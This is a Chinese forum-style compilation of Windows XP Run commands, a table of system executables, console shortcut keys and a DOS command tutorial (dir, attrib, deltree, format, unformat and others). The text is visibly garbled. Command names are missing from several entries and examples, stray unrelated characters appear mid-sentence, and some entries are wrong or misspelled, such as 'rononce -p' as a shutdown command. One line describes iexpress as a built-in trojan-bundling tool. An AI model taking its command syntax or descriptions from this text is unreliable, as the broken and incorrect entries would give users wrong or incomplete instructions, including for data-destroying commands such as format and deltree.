① 計算機常用的命令
我有
DOS命令大全.doc
DOS命令詳解.doc
Windows常用網路命令及命令實例詳解.doc
鍵盤組合功能.doc
開始運行命令集錦.doc
好象都符合你的要求,要的話,EMAIL給來。發給你,但是收到後記得多給點分,這是我長時間收集來的。
已發,去收,收到後加分哦。
去收,別說又丟了。
[email protected]
② 系統命令
他的太亂了~看我的吧!
winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構(WMI)
wupdmgr--------windows更新程序
wscript--------windows腳本宿主設置
write----------寫字板
winmsd---------系統信息
wiaacmgr-------掃描儀和照相機向導
winchat--------XP自帶區域網聊天
mem.exe--------顯示內存使用情況
Msconfig.exe---系統配置實用程序
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠程桌面連接
mplayer2-------媒體播放機
magnify--------放大鏡實用程序
mmc------------打開控制台
mobsync--------同步命令
dxdiag---------檢查DirectX信息
drwtsn32------ 系統醫生
devmgmt.msc--- 設備管理器
dfrg.msc-------磁碟碎片整理程序
diskmgmt.msc---磁碟管理實用程序
dcomcnfg-------打開系統組件服務
ddeshare-------打開DDE共享設置
dvdplay--------DVD播放器
net stop messenger-----停止信使服務
net start messenger----開始信使服務
notepad--------打開記事本
nslookup-------網路管理的工具向導
ntbackup-------系統備份和還原
narrator-------屏幕「講述人」
ntmsmgr.msc----移動存儲管理器
ntmsoprq.msc---移動存儲管理員C作請求
netstat -an----(TC)命令檢查介面
syncapp--------創建一個公文包
sysedit--------系統配置編輯器
sigverif-------文件簽名驗證程序
sndrec32-------錄音機
shrpubw--------創建共享文件夾
secpol.msc-----本地安全策略
syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
services.msc---本地服務設置
Sndvol32-------音量控製程序
sfc.exe--------系統文件檢查器
sfc /scannow---windows文件保護
tsshutdn-------60秒倒計時關機命令
tourstart------xp簡介(安裝完成後出現的漫遊xp程序)
taskmgr--------任務管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打開資源管理器
packager-------對象包裝程序
perfmon.msc----計算機性能監測程序
progman--------程序管理器
regedit.exe----注冊表
rsop.msc-------組策略結果集
regedt32-------注冊表編輯器
rononce -p ----15秒關機
regsvr32 /u *.dll----停止dll文件運行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁碟檢查
certmgr.msc----證書管理實用程序
calc-----------啟動計算器
charmap--------啟動字元映射表
cliconfg-------SQL SERVER 客戶端網路實用程序
Clipbrd--------剪貼板查看器
conf-----------啟動netmeeting
compmgmt.msc---計算機管理
cleanmgr-------垃圾整理
ciadv.msc------索引服務程序
osk------------打開屏幕鍵盤
odbcad32-------ODBC數據源管理器
oobe/msoobe /a----檢查XP是否激活
lusrmgr.msc----本機用戶和組
logoff---------注銷命令
iexpress-------木馬捆綁工具,系統自帶
Nslookup-------IP地址偵測器
fsmgmt.msc-----共享文件夾管理器
utilman--------輔助工具管理器
gpedit.msc-----組策略
...-----我的電腦
winver 檢查Windows版本
wmimgmt.msc 打開Windows管理體系結構(wmi)
wupdmgr Windows更新程序
wscript Windows腳本宿主設置
write 寫字板
winmsd 系統信息
wiaacmgr 掃描儀和照相機向導
winchat xp自帶區域網聊天
mem.exe 顯示內存使用情況
msconfig.exe 系統配置實用程序
mplayer2 簡易widnows media player
mspaint 畫圖板
mstsc 遠程桌面連接
mplayer2 媒體播放機
magnify 放大鏡實用程序
mmc 打開控制台
mobsync 同步命令
dxdiag 檢查directx信息
drwtsn32 系統醫生
devmgmt.msc 設備管理器
dfrg.msc 磁碟碎片整理程序
diskmgmt.msc 磁碟管理實用程序
dcomcnfg 打開系統組件服務
ddeshare 打開dde共享設置
dvdplay dvd播放器
net stop messenger 停止信使服務
net start messenger 開始信使服務
notepad 打開記事本
nslookup 網路管理的工具向導
ntbackup 系統備份和還原
narrator 屏幕「講述人」
ntmsmgr.msc 移動存儲管理器
ntmsoprq.msc 移動存儲管理員操作請求
netstat -an (tc)命令檢查介面
syncapp 創建一個公文包
sysedit 系統配置編輯器
sigverif 文件簽名驗證程序
sndrec32 錄音機
shrpubw 創建共享文件夾
secpol.msc 本地安全策略
syskey 系統加密,一旦加密就不能解開,保護Windows xp系統的雙重密碼
services.msc 本地服務設置
sndvol32 音量控製程序
sfc.exe 系統文件檢查器
sfc /scannow windows文件保護 tsshutdn 60秒倒計時關機命令
tourstart xp簡介(安裝完成後出現的漫遊xp程序)
taskmgr 任務管理器
eventvwr 事件查看器
eudcedit 造字程序
explorer 打開資源管理器
packager 對象包裝程序
perfmon.msc 計算機性能監測程序
progman 程序管理器
regedit.exe 注冊表
rsop.msc 組策略結果集
regedt32 注冊表編輯器
rononce -p 15秒關機
regsvr32 /u *.dll 停止dll文件運行
regsvr32 /u zipfldr.dll 取消zip支持
cmd.exe cmd命令提示符
chkdsk.exe chkdsk磁碟檢查
certmgr.msc 證書管理實用程序
calc 啟動計算器
charmap 啟動字元映射表
cliconfg sql server 客戶端網路實用程序
clipbrd 剪貼板查看器
conf 啟動netmeeting
compmgmt.msc 計算機管理
cleanmgr 垃圾整理
ciadv.msc 索引服務程序
osk 打開屏幕鍵盤
odbcad32 odbc數據源管理器
oobe/msoobe /a 檢查xp是否激活
lusrmgr.msc 本機用戶和組
logoff 注銷命令
iexpress 木馬捆綁工具,系統自帶
nslookup ip地址偵測器
fsmgmt.msc 共享文件夾管理器
utilman 輔助工具管理器
gpedit.msc 組策略
以下為Windows操作系統的常用運行命令,執行這些命令,就能打開系統對應的相關實用程序,如果大家能基本利用,就能檢查並修復系統的最基本的故障,除注銷,關閉系統命令外,其它所有命令,大家不妨一試!!
運行\輸入CMD\輸入 對應的相關實用程序:
. 打開C:\Documents and Settings\XXX(當前登錄Windows XP的用戶名)
.. 打開Windows XP所在的盤符下的Documents and Settings文件夾
... 打開「我的電腦」選項。
accwiz.exe 輔助工具向導
actmovie.exe 直接顯示安裝工具
append.exe 允許程序打開制定目錄中的數據
arp.exe 顯示和更改計算機的IP與硬體物理地址的對應列表
at.exe 計劃運行任務
atmadm.exe ATM調用管理器統計
attrib.exe 顯示和更改文件和文件夾屬性
autochk.exe 檢測修復文件系統 (XP不可用)
autoconv.exe 在啟動過程中自動轉化系統 (XP不可用)
autofmt.exe 在啟動過程中格式化進程 (XP不可用)
autolfn.exe 使用長文件名格式 (XP不可用)
arp.exe 顯示和更改計算機的IP與硬體物理地址的對應
calc.exe 計算器
Bootvrfy.exe 通報啟動成功
cacls.exe 顯示和編輯ACL
cdplayer.exe CD播放器
change.exe 與終端伺服器相關的查詢 (XP不可用)
charmap.exe 字元映射表
chglogon.exe 啟動或停用會話記錄 (XP不可用)
chgport.exe 改變埠(終端服務) (XP不可用)
chgusr.exe 改變用戶(終端服務) (XP不可用)
chkdsk.exe 磁碟檢測程序
chkntfs.exe NTFS磁碟檢測程序
cidaemon.exe 組成Ci文檔服務
cipher.exe 在NTFS上顯示或改變加密的文件或目錄
cisvc.exe 打開索引內容
ckcnv.exe 變換Cookie
cleanmgr.exe 磁碟清理
cliconfg.exe SQL客戶網路工具
clipbrd.exe 剪貼簿查看器
clipsrv.exe 運行Clipboard服務
clspack.exe 建立系統文件列表清單
cluster.exe 顯示域的集群 (XP不可用)
cmd.exe 進2000\XP DOS
cmdl32.exe 自動下載連接管理
cmmgr32.exe 連接管理器
cmmon32.exe 連接管理器監視
cmstp.exe 連接管理器配置文件安裝程序
comclust.exe 集群
comp.exe 比較兩個文件和文件集的內容
conf 啟動netmeeting聊天工具
control userpasswords2 XP密碼管理.
compmgmt.msc 計算機管理
cprofile.exe 轉換顯示模式 (XP不可用)
開始,運行,輸入CMD\輸入net config workstation計算機名 \完整的計算機名\用戶名
工作站處於活動狀態(即網路描述) \軟體版本(即軟體版本號) \工作站域 工作站域的 DNS 名稱
登錄域 \COM 打開時間超時(秒) \COM 發送量(位元組) \COM 發送超時 (msec)
CMD\輸入net config workstation 更改可配置工作站服務設置。
CMD\輸入net config server 可以顯示不能配置的下伺服器計算機名 \伺服器注釋 \伺服器版本(即軟體版本號)
伺服器處於活動狀態(即網路描述) \伺服器處於隱藏狀態(即 /hidden 設置)
最大登錄用戶數(即可使用伺服器共享資源的最大用戶數)
每個會話打開文件的最大數(即用戶可在一個會話中打開伺服器文件的最大數)
空閑會話時間(最小值)
chkdsk.exe 磁碟檢查.
Chkdsk /r 2000命令控制台中的Chkdsk /r命令檢查修復系統文件
cleanmgr 垃圾整理
Clipbrd 剪貼板查看器
C:boot.ini 打開啟動菜單
compact.exe 顯示或改變NTFS分區上文件的壓縮狀態
conime.exe IME控制台
control.exe 控制面板
convert.exe NTFS 轉換文件系統到NTFS
convlog.exe 轉換IIS日誌文件格式到NCSA格式
cprofile.exe 轉換顯示模式
cscript.exe 較本宿主版本
csrss.exe 客戶伺服器Runtime進程 (XP不可用)
csvde.exe 格式轉換程序 (XP不可用)
dcpromo 活動目錄安裝(XP不可用)
drwtsn32 系統醫生
diskmgmt.msc 磁碟管理器(和PowerQuest PartitionMagic 8.0)
dvdplay DVD 播放器
devmgmt.msc 設備管理器(檢查電腦硬體,驅動)
dxdiag 檢查DirectX信息
dcomcnfg.exe DCOM配置屬性 (控制台根目錄)
dcpromo.exe 安裝向導 (XP不可用)
ddeshare.exe DDE共享
debug.exe 檢查DEBUG
dfrgfat.exe FAT分區磁碟碎片整理程序
dfrgntfs.exe NTFS分區磁碟碎片整理程序 (XP不可用)
dfs_cmd_.exe 配置DFS樹 (XP不可用)
dfsinit.exe 分布式文件系統初始化(XP不可用)
dfssvc.exe 分布式文件系統伺服器 (XP不可用)
diantz.exe 製作CAB文件
diskperf.exe 磁碟性能計數器
dmremote.exe 磁碟管理服務的一部分 (XP不可用)
doskey.exe 命令行創建宏
dosx.exe DOS擴展
dplaysvr.exe 直接運行幫助 (XP不可用)
drwatson.exe 華生醫生錯誤檢測
drwtsn32.exe 華生醫生顯示和配置管理
dvdplay.exe DVD播放
dxdiag.exe Direct-X診斷工具
edlin.exe 命令行的文本編輯
esentutl.exe MS資料庫工具
eudcedit.exe 造字程序
eventvwr.exe 事件查看器
exe2bin.exe 轉換EXE文件到二進制
expand.exe 解壓縮
extrac32.exe 解CAB工具
fsmgmt.msc 共享文件夾
fastopen.exe 快速訪問在內存中的硬碟文件
faxcover.exe 傳真封面編輯
faxqueue.exe 顯示傳真隊列
faxsend.exe 發送傳真向導
faxsvc.exe 啟動傳真服務
fc.exe 比較兩個文件的不同
find.exe 查找文件中的文本行
findstr.exe 查找文件中的行
finger.exe 一個用戶並顯示出統計結果
fixmapi.exe 修復MAPI文件
flattemp.exe 允許或者禁用臨時文件目錄 (XP不可用)
fontview.exe 顯示字體文件中的字體
forcedos.exe 強制文件在DOS模式下運行
ftp.exe FTP下載
gpedit.msc 組策略
gdi.exe 圖形界面驅動
grpconv.exe 轉換程序管理員組
hostname.exe 顯示機器的Hostname
Internat 輸入法圖標
iexpress 木馬捆綁工具,系統自帶
ieshwiz.exe 自定義文件夾向導
iexpress.exe iexpress安裝包
iisreset.exe 重啟IIS服務(未安裝IIS,不可用)
internat.exe 鍵盤語言指示器 (XP不可用)
ipconfig.exe 查看IP配置
ipsecmon.exe IP安全監視器
ipxroute.exe IPX路由和源路由控製程序
irftp.exe 無線連接
ismserv.exe 安裝或者刪除Service Control Manager中的服務
jdbgmgr.exe Java4的調試器
jetconv.exe 轉換Jet Engine資料庫 (XP不可用)
jetpack.exe 壓縮Jet資料庫 (XP不可用)
jview.exe Java的命令行裝載者
label.exe 改變驅動器的卷標
lcwiz.exe 許可證向導 (XP不可用)
ldifde.exe LDIF目錄交換命令行管理 (XP不可用)
licmgr.exe 終端服務許可協議管理 (XP不可用)
lights.exe 顯示連接狀況 (XP不可用)
llsmgr.exe Windows 2000 許可協議管理 (XP不可用)
llssrv.exe 啟動許可協議伺服器 (XP不可用)
locator.exe RPC Locator 遠程定位
lodctr.exe 調用性能計數
logoff.exe 注銷當前用戶
lpq.exe 顯示遠端的LPD列印隊列的狀態,顯示被送到基於Unix的伺服器的列印任務
lpr.exe 用於Unix客戶列印機將列印任務發送給連接了列印設備的NT的列印機伺服器。
lsass.exe 運行LSA和Server的DLL
lserver.exe 指定默認Server新的DNS域 (XP不可用)
lusrmgr.msc 本地賬戶管理
mmc 控制台
mplayer2 播放器
macfile.exe 管理MACFILES (XP不可用)
magnify.exe 放大鏡
makecab.exe 製作CAB文件
mem.exe 顯示內存狀態
migpwd.exe 遷移密碼
mmc.exe 控制台
mnmsrvc.exe 遠程桌面共享
mobsync.exe 同步目錄管理器
mountvol.exe 創建、刪除或列出卷的裝入點。
mplay32.exe Media Player 媒體播放器
mpnotify.exe 通知應用程序
mqbkup.exe 信息隊列備份和恢復工具
mqmig.exe MSMQ Migration Utility 信息隊列遷移工具
mrinfo.exe 使用SNMP多點傳送路由
mscdexnt.exe 安裝MSCD
msdtc.exe 動態事務處理控制台
msg.exe 發送消息到本地或遠程客戶
mshta.exe HTML應用程序主機
msiexec.exe 開始Windows安裝程序
mspaint.exe 打開畫圖板
mstask.exe 任務計劃表程序
mstinit.exe 任務計劃表安裝
Msconfig.exe 系統配置實用程序 (配置啟動選項,服務項)
mem.exe 顯示內存使用情況
mspaint 畫圖板
Net Stop Messenger 停止信使服務
Net Start Messenger 恢復信使服務
nslookup 網路管理的工具
Nslookup IP 地址偵測器
ntbackup 系統備份和還原
nbtstat.exe 使用 NBT(TCP/IP 上的 NetBIOS)顯示協議統計和當前 TCP/IP 連接。
nddeapir.exe NDDE API伺服器端
netsh.exe 用於配置和監控 Windows 2000 命令行腳本介面(XP不可用)
netstat.exe 顯示協議統計和當前的 TCP/IP 網路連接。
nlsfunc.exe 載入特定國家的信息。Windows 2000 和 MS-DOS 子系統不使用該命令接受該命令只是為了與 MS-DOS 文件兼容。
notepad.exe 打開記事本
nslookup.exe 該診斷工具顯示來自域名系統 (DNS) 名稱伺服器的信息。
ntbackup.exe 備份和故障修復工具
ntfrs.exe NT文件復制服務 (XP不可用)
ntvdm.exe 模擬16位Windows環境
nw16.exe NetWare轉向器
nwscript.exe 運行Netware腳本
odbcad32.exe 32位ODBC數據源管理 (驅動程序管理)
odbcconf.exe 命令行配置ODBC驅動和數據源
packager.exe 對象包裝程序
pathping.exe 包含Ping和Tracert的程序
pentnt.exe 檢查Pentium的浮點錯誤
perfmon.exe 系統性能監視器
ping.exe 驗證與遠程計算機的連接
posix.exe 用於兼容Unix
print.exe 列印文本文件或顯示列印隊列的內容。
progman.exe 程序管理器
psxss.exe Posix子系統應用程序
qappsrv.exe 在網路上顯示終端伺服器可用的程序
qprocess.exe 在本地或遠程顯示進程的信息(需終端服務)
query.exe 查詢進程和對話 (XP不可用)
quser.exe 顯示用戶登陸的信息(需終端服務)
qwinsta.exe 顯示終端服務的信息
rononce -p 15秒關機
rasAdmin 遠程訪問服務.
regedit.exe 注冊表編輯器
rasadmin.exe 啟動遠程訪問服務 (XP不可用)
rasautou.exe 建立一個RAS連接
rasdial.exe 寬頻,撥號連接
ras.exe 運行RAS連接 (XP不可用)
rcp.exe 計算機和運行遠程外殼埠監控程序 rshd 的系統之間復制文件
rdpclip.exe 終端和本地復制和粘貼文件
recover.exe 從壞的或有缺陷的磁碟中恢復可讀取的信息。
redir.exe 運行重定向服務
regedt32.exe 32位注冊服務
regini.exe 用腳本修改注冊許可
regwiz.exe 注冊向導
replace.exe 用源目錄中的同名文件替換目標目錄中的文件。
rexec.exe rexec 命令在執行指定命令前,驗證遠程計算機上的用戶名,只有安裝了 TCP/IP 協議後才可以使用該命令。
risetup.exe 運行遠程安裝向導服務 (XP不可用)
route.exe 控制網路路由表
rsh.exe 在運行 RSH 服務的遠程計算機上運行命令
rsnotify.exe 遠程存儲通知回顯
runas.exe 允許用戶用其他許可權運行指定的工具和程序
rundll32.exe 啟動32位DLL程序
rwinsta.exe 重置會話子系統硬體和軟體到最初的值
Sndvol32 音量控製程序
sfc.exe 或CMD\ sfc.exe 回車 系統文件檢查器
services.msc 網路連接服務
syskey 系統加密,(一旦加密就不能解開,保護windows xp系統的雙重密碼wupdmgr WIDNOWS UPDATE)
SCANREG/RESTORE 命令恢復最近的注冊表
secedit.exe 自動化安全性配置管理
services.exe 控制所有服務
sethc.exe 設置高對比
setver.exe 設置 MS-DOS 子系統向程序報告的 MS-DOS 版本號
sfc.exe 系統文件檢查
shadow.exe 監控另外一台中端伺服器會話
shrpubw.exe 建立和共享文件夾
sigverif.exe 文件簽名驗證
smlogsvc.exe 性能日誌和警報 (XP不可用)
sndrec32.exe 錄音機
sndvol32.exe 顯示聲音控制信息
snmp.exe 簡單網路管理協議 (XP不可用)
snmptrap.exe SNMP工具 (XP不可用)
srvmgr.exe 伺服器管理器 (XP不可用)
subst.exe 將路徑與驅動器盤符關聯
sysedit.exe 系統配置編輯器
syskey.exe NT賬號資料庫加密工具
sysocmgr.exe > Windows 安裝程序
systray.exe 在低許可權運行systray
taskmgr 任務管理器
tasklist /svc(CMD)了解每個SVCHOST進程到底提供了多少系統服務(2000\98不可用)
tlist -S(CMD) 了解每個SVCHOST進程到底提供了多少系統服務(
taskman.exe 任務管理器 (XP不可用)
taskmgr.exe 任務管理器
tcmsetup.exe 電話服務客戶安裝
tcpsvcs.exe TCP服務
termsrv.exe 終端服務
tftp.exe 將文件傳輸到正在運行 TFTP 服務的遠程計算機或從正在運行 TFTP 服務的遠程計算機傳輸文件
themes.exe 桌面主題 (XP不可用)
tlntadmn.exe Administrator Telnet服務管理
tlntsess.exe 顯示目前的Telnet會話
tlntsvr.exe 開始Telnet服務
tracert.exe 診斷實用程序將包含不同生存時間 (TTL) 值的 Internet 控制消息協議 (ICMP) 回顯數據包發送到目標,以決定到達目標採用的路由
tsadmin.exe Administrator 終端服務管理器 (XP不可用)
tscon.exe 粘貼用戶會話到終端對話
tsdiscon.exe 斷開終端服務的用戶
tskill.exe 殺掉終端服務
tsprof.exe 用終端服務得出查詢結果
tsshutdn.exe 關閉系統
unlodctr.exe 性能監視器的一部分
upg351db.exe 升級Jet資料庫 (XP不可用)
ups.exe UPS service UPS服務
user.exe Windows核心服務
userinit.exe 打開我的文檔
usrmgr.exe 域用戶管理器
utilman.exe 指定2000啟動時自動打開那台機器
vwipxspx.exe 調用IPX/SPX VDM
w32tm.exe 時間伺服器
wextract.exe 解壓縮Windows文件
winchat.exe 打開Windows聊天工具
winhlp32.exe 運行幫助系統
winmsd.exe 查看系統信息
winver.exe 顯示Windows版本
wizmgr.exe Windows管理向導 (XP不可用)
wjview.exe Java 命令行調用Java
write.exe 打開寫字板
wscript.exe 腳本工具
wupdmgr.exe Windows update 運行Windows update升級向導
winver 檢查Windows版本
Win98系統工具
開始,運行,輸入Msconfig 系統配置實用工具 配置啟動選項,包括config.sys、autoexec.bat、win.ini、system.ini和注冊表及程序菜單中的啟動項。並可設置是否故障啟動。
開始,運行,輸入Regedit 注冊表修改工具 注冊表編輯器,如果沒有把握不要隨意修改注冊表!
開始,運行,輸入Regsvr32 dll注冊工具 當提示找不到dll文件時,可用此來注冊該動態連接庫。
開始,運行,輸入Regwiz 注冊向導 用於注冊。校驗系統文件,並可恢復系統文件。
如果啟動時出現類似*.vxd文件錯誤,可用此恢復該vxd文件。
開始,運行,輸入Scandskw 磁碟掃描程序,用於掃描修復磁碟。如果磁碟或文件出現錯誤,可用來初步修復。
開始,運行,輸入DxDiag DirectX診斷工具可用於檢測DirectX運行是否正常。
開始,運行,輸入NETSCAPE
ESC:清除當前命令行;
F7:顯示命令歷史記錄,以圖形列表窗的形式給出所有曾經輸入的命令,並可用上下箭頭鍵選擇再次執行該命令。
F8:搜索命令的歷史記錄,循環顯示所有曾經輸入的命令,直到按下回車鍵為止;
F9:按編號選擇命令,以圖形對話框方式要求您輸入命令所對應的編號(從0開始),並將該命令顯示在屏幕上;
Ctrl+H:刪除游標左邊的一個字元;
Ctrl+C Ctrl+Break,強行中止命令執行;
Ctrl+M:表示回車確認鍵;
Alt+F7:清除所有曾經輸入的命令歷史記錄;
Alt+PrintScreen:截取屏幕上當前命令窗里的內容。
病毒破壞了系統文件,請使用殺毒軟體查殺病毒,然後利用Windows 2000提供的「命令控制台」中的Chkdsk /r命令檢查修復系統文件即可。
按F8進入DOS模式,運行SCANREG/RESTORE命令恢復最近的注冊表
按F8進入安全模式,在運行里輸入SFC,系統文件檢查
③ 懇求DOS命令
dos命令
dos下各種常見命令索引
▲ dir
▲ attrib
▲ cd
▲
▲ x
▲ del
▲ undelete
▲ deltree
▲ dos=high
▲ doskey
▲ emm386.exe
▲ fc
▲ format
▲ unformat
▲ interlnk
▲ intersvr
▲ memmaker
▲ memitem等
▲ mscdex
▲ msd
▲ prompt
▲ ramdrive
▲ subst
▲ mem
▲ "> < >> <<"工具
▲ move
▲ append
▲ call
▲ defrag
▲ device
一、DIR 命令的格式:
dir [D:][PATH][NAME][[/A][:attrib]][/o:[sorted][/s][/b][/l][/c[h]
(1)dir /a:attrib 預設包含所有文件(系統文件.隱含文件)
attrib[:][h/-h]只顯示隱含文件或非隱含文件.
[r/-r]只顯示只讀文件或非只讀文件
[s/-s]只顯示系統文件或非系統文件
[a/-a]只顯示要歸檔文件或非歸檔文件
(2)/o[:]sorted:預設完全按字母順序,子目錄顯示在文件之前
/o[n/-n]:按字母順序或按文件名順序/反向顯示
[e/-e]:按擴展名字母順序/反向顯示
[d/-d]:按時間順序/反向顯示
[s/-s]:按大小從大到小或/反向顯示
[g/-g]:按子目錄先於文件或文件先於子目錄
(3)/s 參數:對當前目錄及其子目錄中所有文件進行列表
列名:dir /s/a/o:n c:\>PRN
將c盤上的所有子目錄和文件按隸屬關系並根據子目錄和文件字母順序列印輸出
(4)/B 參數:將只顯示文件名與擴展名
(5)/L 參數:將全部用小寫字母對文件或子目錄進行列表
訓練:
dir /a 列當前目錄所有文件(含隱含及系統文件)
dir /ah 列隱含文件(包含子目錄(隱含的) dir /a-h
dir /as 列系統文件 dir /a-s
dir /ad 列子目錄 dir /a-d
dir /o 按字母順序
dir /B 只顯示文件名與擴展名
二、attrib [+r|-r] [+a|-a] [+s|-s] [+h|-h] [d: ] [name] [/s]
預設 attrib name 顯示文件的(文件)屬性
attrib io.sys (或子目錄)
shr c:\ io.sys 指定為系統(s) 隱含(h) 只讀(r)文件
也可以attrib *.sys 顯示擴展名為sys的文件屬性
參數 [+r|-r] 將文件屬性設置或解除 只讀屬性
[+a|-a] 將文件屬性設置或解除 歸檔屬性
[+h|-h] 將文件屬性設置或解除 隱含屬性 (尤其對子目錄也起作用)
/s 參數 將當前及當前子目錄下的所有文件均起作用
可以用來查找文件
例子:
attrib news86 列news86的文檔屬性
attrib +r report.txt 設置為只讀 attrib -s -h record.txt
attrib +a a:*.*
attrib -a a:*.bak
x a: b: /a 將A盤上的所有標志為"歸檔"屬性的轎褲慧文件拷到B盤
x a: b: /m 將A盤上的所有文件拷到B盤後並移去歸檔屬性
三、cd 介紹: cd...返回上二級目錄 "."純啟代表當前目錄 "."代表父目錄
cd ..\..返回到上級目錄的父目錄(祖目錄)
cd A:\ 將A盤的當前目錄改為根目錄
cd A:\xx 將A盤的當前目錄改為子目錄xx下
cd ..\98 先返回父目錄,再進入父目錄下的98子目錄
cd ..返回到父目錄
cd\98 進入根目錄下的98子目錄
四、 [/y][/-y][/v][ /B]
/y 不加提示,對所有文件加以覆蓋
/-y 加以提示,對所有文件 (yes或no提問 )
/v 拷貝以後加以校驗
/B 按二進制進行顯示
w1.wps con/b 可以將wps文件在屏幕上顯示,而不必進入wps狀態
..\98 將父目錄下的98子目錄下的所有文件全拷閉答到當前子目錄
.\97 當當前目錄下的97子目錄下文件全部拷到當前目錄
. c:\ 將當前目錄下的所有文件拷到c盤根目錄
. 意味著 *.* 文件
nul a.abc 將a.abc 文件清空(文件長度改為0)
文件名+con 向文本文件中追加命令或內容
con 文件名 創建文本文件(F6存檔退出)
con prn 檢測列印機的開關
五、x命令
x [source] [d:date] [/p] [/s] [/e] [/v] [/y]
x [d:date] x a:b:\ /d:08/18/98/s/v 拷貝98.08.18年後的文件
x [/p] 提示創建子目錄
x [/s] 連帶子目錄一起拷貝. 注意:若目標盤上不存在此子目錄,而在目標
盤的結束符又不以"\"為結束,則將提示:
does destination specify a file name or directory name on the target
[f=file,d=directory]?
在目標盤上創建文件[按下]還是創建子目錄[按下d] ?應選擇d鍵
x[/v] 帶較驗
*:(1) x 不拷貝系統和隱含文件,應先予以修改屬性再拷貝
x [/y] 覆蓋時是否有提示, /y 不帶提示
若省略目標盤或子目錄名,則拷貝到當前目錄下
六、 del /p
加/p 可以在刪除前是否提示
如del後加子目錄名,則將子目錄下所有文件(隱含.系統.只讀文件除外)全刪除,
加/p則可以確認.
七、undelete [name] /au
不加提示地將所有滿足條件的文件恢復(能夠恢復的),並將首字母置成"#",若已
存在,則按"# % & 0 1 2-9 a-z"順序加上.
如:undelete *.dbf/au 將擴展名為"dbf"的文件全恢復,並以"#"開頭,作為文件
名, /list 僅列出可恢復的文件,而不恢復
undelete /load 將undelete裝入內存
/unload 將undelete卸出內存
/s[drive]對指定驅動器進行監測管理
undelete/sc
將 undelete駐留內存,?並創建一個隱含的sentry 子目錄對c盤刪除的文件進行
管理 undelete/ds 恢復
相應恢復命令可以用undelete即可完整恢復出文件名(非常完整)
最常用undelete *.*
deltree /y [drive:path]
deltree 刪除子目錄及文件,盡管有些文件是系統文件或隱含文件
它可以帶有通配符,帶有通配符時,它將刪除符合條件的文件及子目錄
如:?undelete *.dbf/au 將擴展名為"dbf"的文件全恢復,並以"#"開頭作為文件
名.
/list 僅列出可恢復的文件,而不作恢復操作.
undelete/load 將undelete 裝入內存.
/unload將undelete 卸出內存.
/s[drive] 對指定的驅動器進行監視管理.
undelete/sc 將undelete 駐留內存,並創建一個隱含的sentry子目錄對C盤刪除
的文件進行管理.相應恢復命令可以用undelete/ds 即可完整恢復出文件名(很完善).
最常用的是undelete *.*
八、deltree /y [drive:path]
deltree 刪除子目錄及文件,盡管有些文件是系統或隱含的.
它可以帶有通配符,這時它將刪除符合條件的文件或子目錄.
如:存在L1文件,L2子目錄,L3文件,L4子目錄
deltree L*.* 將刪除以上所有的文件和子目錄,但在刪除前加以確認,若不刪除,
可以輸入"N".
/y 參數是在刪除時不加以確認就進行操作的.
它刪除的文件可以用undelete恢復,?但不能恢復子目錄及其下的文件,可以用特
殊工具.如NORTON 8.0 等.
若提前使用了undelete/s,?則可以在sentry子目錄下找到完整的文件,但名已經
改變了.
九、dos=high[|low[umb|noumb]]
dos=high,umb 則dos將自身裝入高端內存(high)並能管理上位內存(umb).
noumb 則不管理上位內存.
在寫入dos=high及umb 前應裝入device=himem.sys
為了將程序或驅動程序裝入上位內存,必須使用dos=umb,可省出大部分常規內存.
可以在config.sys的任何位置寫上dos=high,umb
若顯示hma not avoiable 或 load down low 則表明不能使用高端內存.
十、doskey 記錄以前敲過的dos命令,可以用F7來顯示,用"↑↓"來選擇,用F9來輸入
選擇的命令號.
doskey/restall 重新裝入一次,以前的命令行撤消.
doskey/history 顯示內存中所有的命令,可以">"顯示到其它文件中,縮寫"/H".
doskey dir=cls 則擊入dir等同於cls一樣.
doskey/macros 可顯示所有的宏定義,可使用">"重定義到文件中,可縮寫"/M".
doskey dir= 可撤消對dir 的宏定義.
doskey p=dir$tdir*.exe/p$tdir c:\t$tdir c:\t$*
$t為命令的區分符,而$*為命令的結束符
doskey/insert(overstrike)?在重新輸入命令時,對舊命令的修改是插入還是覆
蓋狀態(默認).
十一、emm386.exe
提供對擴展內存的管理,使應用程序象使用常規內存一樣能夠使用它.
常見的用法是 在config.sys 中
device=c:\dos\himem.sys
device=c:\dos\emm386.exe ram
d=64 將DMA 內存數量設置為64K
noems 提供對上位內存的訪問,但不提供對擴展內存的訪問.
應注意的是在windows中最好不要用它,因為windows本身有對擴展內存進行管理
的程序.應採用windows中的管理器.
十二、fc 命令 fc/b dt.dat dt2.dat>b (作二進制代碼比較)
比較兩個文件,一般用作存取進度,修改游戲存儲文件用.
實際代碼位置應加上0100 如:0000 05E4:00 67
實際用debug -e 修改時應加上0100 即 0000 06E4:00 67
後面加上重定向文件">P" 可以將比較結果輸出到p文件中.
十三、format /q /u /s /n:sectors /f:size /c
/q參數:快速格式化,僅掃描文件分配表和根目錄區,僅對格式化過的磁碟有效.
使用時應確保格式化過後沒有增加新的壞道.
/u參數:無條件格式化,並且不保存原來盤上的信息,可以防止"unformat".
/s參數:格式化為系統盤,也可以使用"sys"命令.
/f:size size 可以為160 180 320 360 720 1200 1440 2800
/n:sector n可以為1 格式為單面盤,容量為160k 180k
可以為4 可以在5寸高密驅動器上格式化360k磁碟
可以為8 可以在5寸高密驅動器上進行8個扇區的格式化.
/c 重新測試壞扇區,預設時如果一個扇區標記為"壞",以後格式時就不在從新測
試,僅作標記,使用"/C"時可以從新測試.
十四、unformat 命令
對用format 格式過,且未用"/u"參數的命令起作用,用它可以來重新修復已經損
壞的硬碟分區表,但對網路盤不起作用.
unformat drive:[/l][/test][/p]
/l 顯示每一個被unformat發現的文件和子目錄,如果沒有這個開關,只顯示那些
破碎的文件和子目錄,可以用ctrl+s 暫停,按任意鍵繼續.
/test 僅作一個測試,不作實際的修復工作,作模擬過程.
/p 一邊測試一邊列印.
注:這種方法不能保證修復所有的文件,尤其是格式化後又添加過數據的磁碟.
恢復後的文件依次存放在subdir1....2....3等子目錄中.
十五、interlnk 語法 interlnk g=e ,它可以通過串口或並口在兩機間進行通訊.
將伺服器端上的e驅動器映射為客戶端的g驅動器,以後對客戶端而言,所有對g的
操作都意味著對伺服器的訪問,取消映射的辦法為interlnk g=
單獨輸入interlnk 則顯示所有的映射情況.
